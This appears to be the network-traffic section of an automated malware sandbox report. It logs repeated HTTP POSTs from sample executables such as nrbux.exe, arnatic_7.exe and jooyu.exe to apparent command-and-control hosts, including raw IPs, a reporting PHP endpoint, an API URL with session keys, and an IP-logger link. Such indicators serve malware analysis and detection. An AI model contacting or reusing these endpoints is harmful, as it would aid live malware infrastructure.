                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.4kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        690 B
                                                                                                                                                                                        292 B
                                                                                                                                                                                        7
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        704 B
                                                                                                                                                                                        405 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 31.13.83.36:443
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        6.4kB
                                                                                                                                                                                        271.1kB
                                                                                                                                                                                        118
                                                                                                                                                                                        209

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 88.218.92.148:80
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=294199&key=5064a966816af6ace47aab1ab46f52fa
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_4.exe
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        945 B
                                                                                                                                                                                        10
                                                                                                                                                                                        10

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://uyg5wye.2ihsfa.com/api/?sid=294199&key=5064a966816af6ace47aab1ab46f52fa

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        920 B
                                                                                                                                                                                        492 B
                                                                                                                                                                                        12
                                                                                                                                                                                        12

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 208.95.112.1:80
                                                                                                                                                                                        http://ip-api.com/json/?fields=8198
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        890 B
                                                                                                                                                                                        726 B
                                                                                                                                                                                        13
                                                                                                                                                                                        12

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://ip-api.com/json/?fields=8198

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 157.240.201.35:443
                                                                                                                                                                                        https://www.facebook.com/
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        6.6kB
                                                                                                                                                                                        271.5kB
                                                                                                                                                                                        122
                                                                                                                                                                                        221

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.facebook.com/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 88.218.92.148:80
                                                                                                                                                                                        http://uyg5wye.2ihsfa.com/api/?sid=294941&key=932c845d57a1c057ea8918c49d9c66f3
                                                                                                                                                                                        http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        921 B
                                                                                                                                                                                        10
                                                                                                                                                                                        10

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://uyg5wye.2ihsfa.com/api/fbtime

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://uyg5wye.2ihsfa.com/api/?sid=294941&key=932c845d57a1c057ea8918c49d9c66f3

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 88.99.66.31:443
                                                                                                                                                                                        https://iplogger.org/18hh57
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        6.5kB
                                                                                                                                                                                        12
                                                                                                                                                                                        16

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iplogger.org/18hh57

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 90.191.200.51:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        814 B
                                                                                                                                                                                        464 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 90.191.200.51:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        679 B
                                                                                                                                                                                        450 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.5kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        704 B
                                                                                                                                                                                        405 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        644 B
                                                                                                                                                                                        252 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
